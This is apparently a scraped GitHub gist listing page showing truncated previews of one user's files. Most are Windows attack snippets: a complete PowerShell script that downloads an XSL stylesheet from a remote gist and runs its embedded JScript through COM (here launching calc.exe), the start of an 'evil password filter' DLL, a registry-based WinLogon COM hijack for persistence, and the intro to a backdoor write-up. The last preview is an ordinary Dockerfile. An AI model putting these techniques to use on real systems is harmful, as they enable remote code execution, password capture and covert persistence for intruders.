disk-kk
/ PowerShell_COM_XSL_Transform.txt
Created
June 3, 2018 10:22
Some fun with COM remote XSL/T fetch and execute
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $xHttp = new-object -com Msxml2.XMLHTTP.6.0 | |
| $xhttp.open("GET","https://gist.githubusercontent.com/caseysmithrc/680ef7a2d660fb62ce13a3bd130b8adf/raw/cc4a1b4d8eb26cc9aea61ae267db7ecae28e9f33/minimalist.xml") | |
| $xhttp.send() | |
| $xsl = new-object -com Msxml2.DOMDocument.6.0 | |
| $xsl.setProperty("AllowXsltScript",$true) | |
| $xsl.loadXML($xHttp.responseText()) | |
| $xsl.transformNode($xsl) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <xsl:stylesheet version="1.0" | |
| xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
| xmlns:msxsl="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="http://mycompany.com/mynamespace"> | |
| <msxsl:script language="JScript" implements-prefix="user"> | |
| function xml(nodelist) { | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| return nodelist.nextNode().xml; |
disk-kk
/ evilpassfilter.cpp
Created
June 8, 2018 10:21
— forked from mubix/evilpassfilter.cpp
Evil "Password Filter"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <WinInet.h> | |
| #include <ntsecapi.h> | |
| void writeToLog(const char* szString) | |
| { | |
| FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
| if (NULL == pFile) | |
| { |
disk-kk
/ winlogon.reg
Created
June 13, 2018 16:31
— forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From the inside out, a minimalist backdoor. | |
| I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN. | |
| We will use in this example 3 tools. | |
| 1. Node | |
| 2. PowerShell | |
| 3. LocalTunnel | |
| While I have a full compact, custom version, I will not release this. |
disk-kk
/ Dockerfile
Created
July 1, 2019 10:50
— forked from deliro/Dockerfile
python alpine lxml image example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM python:3.7-alpine | |
| EXPOSE 8000 | |
| WORKDIR /app | |
| COPY . . | |
| RUN apk add --update --no-cache --virtual .build-deps \ | |
| g++ \ | |
| python-dev \ | |
| libxml2 \ | |
| libxml2-dev && \ |